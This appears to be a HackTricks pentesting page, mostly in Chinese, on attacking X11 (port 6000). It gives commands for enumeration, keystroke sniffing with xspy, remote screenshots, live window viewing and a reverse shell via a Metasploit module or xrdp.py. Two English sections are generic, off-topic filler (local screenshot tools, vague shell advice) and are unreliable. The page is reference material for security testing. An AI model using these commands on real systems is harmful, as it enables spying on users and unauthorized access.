hacktricks/network-services-pentesting/6000-pentesting-x11.md

# 6000 - X11渗透测试

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 你在一家**网络安全公司**工作吗？想要在HackTricks中看到你的**公司广告**吗？或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**

</details>

<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

**HackenProof是所有加密漏洞赏金的家园。**

**无需等待即可获得奖励**\
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后，您将获得奖励。

**在web3渗透测试中积累经验**\
区块链协议和智能合约是新的互联网！在其兴起的时代掌握web3安全。

**成为web3黑客传奇**\
每次验证的漏洞都会获得声望积分，并占据每周排行榜的榜首。

[**在HackenProof上注册**](https://hackenproof.com/register)开始从您的黑客攻击中获利！

{% embed url="https://hackenproof.com/register" %}

## 基本信息

X Window System（也称为X）是一种用于位图显示的窗口系统，常见于基于UNIX的操作系统。X为基于GUI的环境提供了基本框架。X也不强制要求用户界面 - 这由各个程序处理。\
来源：[https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)

**默认端口：**6000
```
PORT       STATE   SERVICE
6000/tcp   open    X11
```
## 枚举

检查**匿名连接：**
```bash
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
```
#### 本地枚举

用户主目录中的文件**`.Xauthority`**被**X11用于授权**。来自[**这里**](https://stackoverflow.com/a/37367518)：

> MIT-magic-cookie-1：生成128位的密钥（“cookie”），将其存储在\~/.Xauthority（或XAUTHORITY环境变量指向的位置）。客户端以明文形式将其发送到服务器！服务器检查是否有此“cookie”的副本，如果有，则允许连接。密钥由DMX生成。

{% hint style="warning" %}
为了**使用cookie**，您应该设置环境变量：**`export XAUTHORITY=/path/to/.Xauthority`**
{% endhint %}

## 验证连接
```bash
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
## 键盘记录

使用[xspy](http://tools.kali.org/sniffingspoofing/xspy)来嗅探键盘按键。

示例输出：
```
xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
## 截图捕获

To capture screenshots during a penetration test, you can use various tools and techniques. Here are some common methods:

### 1. Scrot

Scrot is a command-line tool that allows you to capture screenshots in Linux. You can install it using the following command:

```
sudo apt-get install scrot
```

To capture a screenshot, simply run the following command:

```
scrot screenshot.png
```

This will save the screenshot as `screenshot.png` in the current directory.

### 2. Shutter

Shutter is a feature-rich screenshot tool for Linux. You can install it using the following command:

```
sudo apt-get install shutter
```

Once installed, you can launch Shutter from the applications menu. It provides a graphical interface to capture screenshots and offers various editing options.

### 3. Flameshot

Flameshot is another popular screenshot tool for Linux. You can install it using the following command:

```
sudo apt-get install flameshot
```

To capture a screenshot, run the following command:

```
flameshot gui
```

This will open the Flameshot interface, allowing you to capture and edit screenshots.

### 4. Snipping Tool (Windows)

If you are using Windows, you can use the built-in Snipping Tool to capture screenshots. Simply search for "Snipping Tool" in the Start menu and launch the application. It provides a user-friendly interface to capture screenshots.

### 5. Snip & Sketch (Windows 10)

For Windows 10 users, Snip & Sketch is a built-in screenshot tool. You can search for "Snip & Sketch" in the Start menu and launch the application. It offers various screenshot capture options and editing features.

Remember to use these tools responsibly and only capture screenshots within the scope of your penetration test.
```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```
## 远程桌面查看

来源：[https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
```
./xrdp.py <IP:0>
```
从：[https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)

首先，我们需要使用xwininfo找到窗口的ID。
```
xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0
```
**XWatchwin**

对于**实时查看**，我们需要使用
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
## 获取Shell

To get a shell on a target system, you can exploit vulnerabilities in the X11 server or use X11 forwarding.

### Exploiting X11 Server Vulnerabilities

1. **X11 Server Misconfiguration**: Check if the X11 server is misconfigured and allows connections from unauthorized hosts. If so, you can connect to the X11 server and execute commands.

2. **X11 Server Buffer Overflow**: Exploit buffer overflow vulnerabilities in the X11 server to execute arbitrary code and gain a shell.

3. **X11 Server Authentication Bypass**: Exploit authentication bypass vulnerabilities in the X11 server to gain unauthorized access and execute commands.

### Using X11 Forwarding

1. **SSH X11 Forwarding**: If the target system has SSH enabled with X11 forwarding, you can use the `-X` or `-Y` option to enable X11 forwarding and run graphical applications remotely.

2. **X11 Forwarding over Netcat**: Use Netcat to forward X11 traffic between the target system and your machine. This allows you to run X11 applications on the target system and interact with them remotely.

3. **X11 Forwarding over SSH Tunnel**: Set up an SSH tunnel to forward X11 traffic between the target system and your machine. This allows you to securely run X11 applications on the target system and interact with them remotely.

Remember to always obtain proper authorization before attempting to gain shell access on a target system. Unauthorized access is illegal and unethical.
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
另一种方法：

**反向Shell：** Xrdp还允许通过Netcat获取反向Shell。输入以下命令：

**./xrdp.py \<IP:0> –no-disp**

![](../.gitbook/assets/112217\_0051\_ExploitingX15.jpeg)

它将提示一个新的控制面板，在这里我们可以看到R-shell选项，如下所示：

![](../.gitbook/assets/112217\_0051\_ExploitingX16.jpeg)

我们将在本地系统上的端口5555上启动Netcat监听模式，如下所示：

![](../.gitbook/assets/112217\_0051\_ExploitingX17.jpeg)

然后添加IP和端口，然后选择R-Shell，如下所示：

![](../.gitbook/assets/112217\_0051\_ExploitingX18.jpeg)

现在，如下所示，我们已经完全访问了系统：

![](../.gitbook/assets/112217\_0051\_ExploitingX19.jpeg)

{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}

## Shodan

* `port:6000 x11`

<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>

**HackenProof是所有加密漏洞赏金的家园。**

**即时获得奖励**\
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞经过验证后，您将获得奖励。

**在web3渗透测试中积累经验**\
区块链协议和智能合约是新的互联网！在其崛起之时掌握web3安全。

**成为web3黑客传奇**\
每次验证的漏洞都会获得声望积分，并占据每周排行榜的榜首。

[**在HackenProof上注册**](https://hackenproof.com/register) 开始从您的黑客攻击中获利！

{% embed url="https://hackenproof.com/register" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 您在**网络安全公司**工作吗？您想在HackTricks中看到您的**公司广告**吗？或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**

</details>